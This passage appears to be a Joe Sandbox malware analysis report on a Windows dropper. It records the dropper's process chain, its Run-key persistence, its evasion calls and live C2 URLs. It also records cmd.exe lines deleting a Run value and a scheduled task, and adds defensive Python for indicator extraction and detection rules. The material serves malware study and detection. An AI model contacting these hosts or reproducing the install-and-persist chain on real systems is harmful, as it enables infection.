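The URL rows above are raw string carves, not a clean indicator list: the first row fuses two URLs and a printf-style format string ("%s%s%s:Zone.Identifier", the template the sample uses to address a dropped file's Zone.Identifier stream, which matches the Zone.Identifier delete opens recorded later in this report), and the "peinstall.phpP", "peinstall.phpystem32" and "newtpp.exeP0" rows are the same URL followed by whatever bytes sat next to it in memory. The schemas.xmlsoap.org rows are standard SOAP namespace URIs from newtpp[1].exe, not network indicators. The following is an added example, not part of the Joe Sandbox report and not the sample's own code, that turns those carves into a de-duplicated indicator set: it splits fused strings at each "http://", cuts a URL at the first "%" that is not a valid percent-escape, collapses a URL that has a file extension plus trailing bytes onto the exact URL it extends, and marks as unverified anything it had to cut (the "/12345" piece, which may belong to a neighbouring string) or that is only a longer form of another carved path (the "gonup1/gonup8/gonupll9z" rows, which could be real paths or overruns; the report does not settle that). The overrun rule, the benign-host allowlist and the "unverified" heuristic are my choices; the carved strings are copied from the rows above.

```python
import re

URL_START = re.compile(r"https?://")
# A '%' that does not begin a valid %XX escape (e.g. printf's "%s") or any
# whitespace/quote ends the URL: what follows is another string in memory.
CUT = re.compile(r"%(?![0-9A-Fa-f]{2})|[\s\"'<>]")
# URL that ends in a file name plus trailing non-space bytes: candidate overrun.
OVERRUN = re.compile(r"^(https?://[^/\s]+/.*?\.(?:exe|php|dll|zip|txt))(\S+)$", re.I)
# Standard SOAP namespace URIs are not C2 (allowlist is an assumption of this example).
BENIGN_HOSTS = {"schemas.xmlsoap.org"}

# Strings copied from the "String found in binary or memory" rows of this report.
CARVED = [
    "http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s",
    "http://91.202.233.141/",
    "http://91.202.233.141/gonup",
    "http://91.202.233.141/gonup1",
    "http://91.202.233.141/gonup8",
    "http://91.202.233.141/gonupll9z",
    "http://schemas.xmlsoap.org/soap/encoding/",
    "http://schemas.xmlsoap.org/soap/envelope/",
    "http://twizt.net/",
    "http://twizt.net/newtpp.exe",
    "http://twizt.net/newtpp.exeP0",
    "http://twizt.net/peinstall.php",
    "http://twizt.net/peinstall.php%temp%%s",
    "http://twizt.net/peinstall.phpP",
    "http://twizt.net/peinstall.phpp",
    "http://twizt.net/peinstall.phpvPO",
    "http://twizt.net/peinstall.phpystem32",
]


def split_fused(s):
    """Return (url, was_cut) for every http(s):// substring of a carved string."""
    starts = [m.start() for m in URL_START.finditer(s)]
    out = []
    for i, st in enumerate(starts):
        end = starts[i + 1] if i + 1 < len(starts) else len(s)
        piece = s[st:end]
        m = CUT.search(piece)
        out.append((piece[: m.start()], True) if m else (piece, False))
    return out


def extract_iocs(carved):
    """Canonical URL list plus the evidence for each normalisation decision."""
    pieces = [p for s in carved for p in split_fused(s)]
    # Only strings carved whole (not cut at a format specifier) count as exact.
    exact = {url for url, was_cut in pieces if not was_cut}
    urls, overruns, unverified, benign = [], {}, [], []
    for url, was_cut in pieces:
        host = url.split("/")[2]
        if host in BENIGN_HOSTS:
            if url not in benign:
                benign.append(url)
            continue
        m = OVERRUN.match(url)
        if m and m.group(1) in exact:
            # e.g. ".phpystem32": the exact URL exists, the tail is adjacent memory.
            overruns[url] = m.group(1)
            url, was_cut = m.group(1), False
        # A longer form of another exact path, or a piece we had to cut, is
        # reported but not trusted as a distinct indicator.
        shadowed = any(q != url and url.startswith(q) and not q.endswith("/") for q in exact)
        if (was_cut and url not in exact) or shadowed:
            if url not in unverified:
                unverified.append(url)
        if url not in urls:
            urls.append(url)
    return {"urls": urls, "overruns": overruns, "unverified": unverified, "benign": benign}


if __name__ == "__main__":
    for key, value in extract_iocs(CARVED).items():
        print(key, value)
```

Run on the rows above this yields ten URLs instead of seventeen, five of them explained as overruns of http://twizt.net/newtpp.exe and http://twizt.net/peinstall.php, and four flagged unverified; only the flagged-clean entries should go into a blocklist, the unverified ones belong in a watch list until a second source confirms them.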
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Code function: 3_2_00405970 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Code function: 3_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Windows\sysnldcvmr.exe | Code function: 4_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Windows\sysnldcvmr.exe | Code function: 7_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Code function: 3_2_0040D4A0 NtQuerySystemTime,RtlTimeToSecondsSince1980
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Code function: 3_2_0040F0B1 NtQueryVirtualMemory
Source: C:\Windows\sysnldcvmr.exe | Code function: 4_2_0040D4A0 NtQuerySystemTime,RtlTimeToSecondsSince1980
Source: C:\Windows\sysnldcvmr.exe | Code function: 4_2_0040F0B1 NtQueryVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Code function: 6_2_00007FF7BFFE0685 NtQuerySystemInformation
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Code function: 6_2_00007FF7BFFE0690 NtQuerySystemInformation
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Code function: 6_2_00007FF7BFFE0F11 NtQuerySystemInformation
Source: C:\Windows\sysnldcvmr.exe | Code function: 7_2_0040D4A0 NtQuerySystemTime,RtlTimeToSecondsSince1980
Source: C:\Windows\sysnldcvmr.exe | Code function: 7_2_0040F0B1 NtQueryVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | File created: C:\Windows\sysnldcvmr.exe
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Code function: 3_2_0040EE74
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Code function: 3_2_00404090
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Code function: 3_2_00407B49
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Code function: 3_2_00404970
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Code function: 3_2_0040A500
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Code function: 3_2_00407B20
Source: C:\Windows\sysnldcvmr.exe | Code function: 4_2_0040EE74
Source: C:\Windows\sysnldcvmr.exe | Code function: 4_2_00404090
Source: C:\Windows\sysnldcvmr.exe | Code function: 4_2_00407B49
Source: C:\Windows\sysnldcvmr.exe | Code function: 4_2_00404970
Source: C:\Windows\sysnldcvmr.exe | Code function: 4_2_0040A500
Source: C:\Windows\sysnldcvmr.exe | Code function: 4_2_00407B20
Source: C:\Windows\sysnldcvmr.exe | Code function: 7_2_0040EE74
Source: C:\Windows\sysnldcvmr.exe | Code function: 7_2_00404090
Source: C:\Windows\sysnldcvmr.exe | Code function: 7_2_00407B49
Source: C:\Windows\sysnldcvmr.exe | Code function: 7_2_00404970
Source: C:\Windows\sysnldcvmr.exe | Code function: 7_2_0040A500
Source: C:\Windows\sysnldcvmr.exe | Code function: 7_2_00407B20
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\240016073.exe 5850892F67F85991B31FC90F62C8B7791AFEB3C08AE1877D857AA2B59471A2EA
Source: 240016073.exe.4.dr | Static PE information: No import functions for PE file found
Source: LM94OE0VNK.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Source: classification engine | Classification label: mal100.evad.winEXE@20/10@1/7
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Code function: 3_2_00406BC0 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Code function: 3_2_00406460 CoInitialize,CoCreateInstance,wsprintfW
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\newtpp[1].exe
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1200:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3096:120:WilError_03
Source: C:\Windows\sysnldcvmr.exe | Mutant created: \Sessions\1\BaseNamedObjects\753f85d83d
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | File created: C:\Users\user\AppData\Local\Temp\2374323789.exe
Source: LM94OE0VNK.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | System information queried: HandleInformation
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: LM94OE0VNK.exe | ReversingLabs: Detection: 52%
Source: unknown | Process created: C:\Users\user\Desktop\LM94OE0VNK.exe "C:\Users\user\Desktop\LM94OE0VNK.exe"
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Process created: C:\Users\user\AppData\Local\Temp\2374323789.exe C:\Users\user\AppData\Local\Temp\2374323789.exe
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Process created: C:\Windows\sysnldcvmr.exe C:\Windows\sysnldcvmr.exe
Source: C:\Windows\sysnldcvmr.exe | Process created: C:\Users\user\AppData\Local\Temp\240016073.exe C:\Users\user\AppData\Local\Temp\240016073.exe
Source: unknown | Process created: C:\Windows\sysnldcvmr.exe "C:\Windows\sysnldcvmr.exe"
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
Source: C:\Windows\sysnldcvmr.exe | Process created: C:\Users\user\AppData\Local\Temp\2693731851.exe C:\Users\user\AppData\Local\Temp\2693731851.exe
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Section loaded: ntmarta.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: apphelp.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: urlmon.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: wininet.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: iertutil.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: srvcli.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: netutils.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: uxtheme.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: sspicli.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: windows.storage.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: wldp.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: profapi.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: mswsock.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: napinsp.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: wshbth.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: nlaapi.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: dnsapi.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: winrnr.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: winhttp.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: winnsi.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: firewallapi.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: fwbase.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: cryptsp.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: rsaenh.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: urlmon.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: wininet.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: iertutil.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: srvcli.dll
Source: C:\Windows\sysnldcvmr.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\2693731851.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\2693731851.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\2693731851.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\2693731851.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\2693731851.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\2693731851.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll
Source: LM94OE0VNK.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: LM94OE0VNK.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: LM94OE0VNK.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: LM94OE0VNK.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: LM94OE0VNK.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: LM94OE0VNK.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Code function: 0_2_009C1A11 push ecx; ret 0_2_009C1A24

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Executable created and started: C:\Windows\sysnldcvmr.exe
Source: C:\Windows\sysnldcvmr.exe | File created: C:\Users\user\AppData\Local\Temp\240016073.exe
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | File created: C:\Users\user\AppData\Local\Temp\2374323789.exe
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | File created: C:\Windows\sysnldcvmr.exe
Source: C:\Windows\sysnldcvmr.exe | File created: C:\Users\user\AppData\Local\Temp\2693731851.exe
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\newtpp[1].exe

Boot Survival

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows Settings
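Read together, the process tree, the dropped files and the Boot Survival rows describe one installation chain: the desktop sample writes and starts Temp\2374323789.exe, which copies itself to C:\Windows\sysnldcvmr.exe, starts that copy and registers it under the HKLM Run key as "Windows Settings" (a 32-bit writer to HKLM\SOFTWARE\...\Run lands under WOW6432Node, which is why the key appears there); sysnldcvmr.exe then drops and runs the .NET payload 240016073.exe (it loads mscoree.dll), which spawns cmd.exe to remove a "Windows Upgrade Manager" Run value and scheduled task that nothing in this trace creates, so the deletion targets an earlier or competing installation rather than this sample's own persistence. The following is an added example, not part of the Joe Sandbox report and not code from the sample, that turns that chain into host-telemetry rules: an executable written directly into the Windows root by a process running from the user's Temp directory, a Windows-root executable started by a Temp parent, a Run value written by a Temp binary, and reg.exe/schtasks.exe command lines that delete Run values or tasks. The Event shape is a simplified Sysmon-style record, the rule names and regexes are my own, and the event list is constructed from the rows in this report (plus one benign notepad.exe start as a control).

```python
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str          # "process", "file" or "registry"
    image: str         # acting process image path
    parent: str = ""   # parent image (process events)
    cmdline: str = ""  # command line (process events)
    target: str = ""   # created file, or written registry key\value


TEMP_DIR = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.I)
# An .exe directly under C:\Windows (not System32, SysWOW64, ...): legitimate
# installers almost never put a binary there, this sample does.
WINDIR_ROOT = re.compile(r"^[A-Z]:\\Windows\\[^\\]+\.exe$", re.I)
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run\b", re.I)
REG_DELETE_RUN = re.compile(r"\breg(?:\.exe)?\s+delete\b.*\\CurrentVersion\\Run\b", re.I)
SCHTASKS_DELETE = re.compile(r"\bschtasks(?:\.exe)?\b.*\s/delete\b", re.I)


def _arg(cmdline, flag):
    """Value of a /flag argument, quoted or bare, or '' when absent."""
    m = re.search(rf'/{flag}\s+(?:"([^"]+)"|(\S+))', cmdline, re.I)
    return (m.group(1) or m.group(2)) if m else ""


def classify(ev):
    """Return (rule, detail) pairs that fire for one event."""
    hits = []
    if ev.kind == "file" and TEMP_DIR.match(ev.image) and WINDIR_ROOT.match(ev.target):
        hits.append(("exe-dropped-to-windows-root", ev.target))
    elif ev.kind == "process":
        if TEMP_DIR.match(ev.parent) and WINDIR_ROOT.match(ev.image):
            hits.append(("windows-root-exe-started-from-temp", ev.image))
        if REG_DELETE_RUN.search(ev.cmdline):
            hits.append(("run-key-value-deleted", _arg(ev.cmdline, "v")))
        if SCHTASKS_DELETE.search(ev.cmdline):
            hits.append(("scheduled-task-deleted", _arg(ev.cmdline, "tn")))
    elif ev.kind == "registry" and TEMP_DIR.match(ev.image) and RUN_KEY.search(ev.target):
        hits.append(("run-key-value-set-by-temp-binary", ev.target))
    return hits


def triage(events):
    """Group fired details by rule, first-seen order, duplicates removed."""
    out = {}
    for ev in events:
        for rule, detail in classify(ev):
            lst = out.setdefault(rule, [])
            if detail not in lst:
                lst.append(detail)
    return out


# Constructed from this report's process tree, dropped files and Run-key row.
EVENTS = [
    Event("file", r"C:\Users\user\Desktop\LM94OE0VNK.exe", target=r"C:\Users\user\AppData\Local\Temp\2374323789.exe"),
    Event("process", r"C:\Users\user\AppData\Local\Temp\2374323789.exe", parent=r"C:\Users\user\Desktop\LM94OE0VNK.exe",
          cmdline=r"C:\Users\user\AppData\Local\Temp\2374323789.exe"),
    Event("file", r"C:\Users\user\AppData\Local\Temp\2374323789.exe", target=r"C:\Windows\sysnldcvmr.exe"),
    Event("process", r"C:\Windows\sysnldcvmr.exe", parent=r"C:\Users\user\AppData\Local\Temp\2374323789.exe",
          cmdline=r"C:\Windows\sysnldcvmr.exe"),
    Event("registry", r"C:\Users\user\AppData\Local\Temp\2374323789.exe",
          target=r"HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings"),
    Event("file", r"C:\Windows\sysnldcvmr.exe", target=r"C:\Users\user\AppData\Local\Temp\240016073.exe"),
    Event("process", r"C:\Users\user\AppData\Local\Temp\240016073.exe", parent=r"C:\Windows\sysnldcvmr.exe",
          cmdline=r"C:\Users\user\AppData\Local\Temp\240016073.exe"),
    Event("process", r"C:\Windows\System32\cmd.exe", parent=r"C:\Users\user\AppData\Local\Temp\240016073.exe",
          cmdline=r'"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f'),
    Event("process", r"C:\Windows\System32\cmd.exe", parent=r"C:\Users\user\AppData\Local\Temp\240016073.exe",
          cmdline=r'"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"'),
    # Control: a normal interactive start that must not fire anything.
    Event("process", r"C:\Windows\System32\notepad.exe", parent=r"C:\Windows\explorer.exe", cmdline="notepad.exe"),
]

if __name__ == "__main__":
    for rule, details in triage(EVENTS).items():
        print(rule, details)
```

The Windows-root and Temp-parent rules are deliberately narrow so they stay quiet on a normal endpoint; the reg/schtasks deletion rules fire on administrators too, so they are best used as enrichment for an alert raised by the first three rather than as stand-alone alerts.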

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\LM94OE0VNK.exe | File opened: C:\Users\user\AppData\Local\Temp\2374323789.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | File opened: C:\Users\user\AppData\Local\Temp\2374323789.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\sysnldcvmr.exe | File opened: C:\Windows\sysnldcvmr.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\sysnldcvmr.exe | File opened: C:\Users\user\AppData\Local\Temp\240016073.exe:Zone.Identifier read attributes | delete
Source: C:\Windows\sysnldcvmr.exe | File opened: C:\Users\user\AppData\Local\Temp\2693731851.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\Desktop\LM94OE0VNK.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Process information set: NOOPENFILEERRORBOX (20 occurrences)

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Code function: 3_2_0040CCF0
Source: C:\Windows\sysnldcvmr.exe | Code function: 4_2_0040CCF0
Source: C:\Windows\sysnldcvmr.exe | Code function: 7_2_0040CCF0
Source: C:\Windows\sysnldcvmr.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_4-4357)
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep (graph_3-4355)
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_3-4355)
Source: C:\Windows\sysnldcvmr.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep (graph_4-4357)
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Memory allocated: 1660000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Memory allocated: 1C0F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\240016073.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\2374323789.exe | Evaded block: after key decision (graph_3-4416)
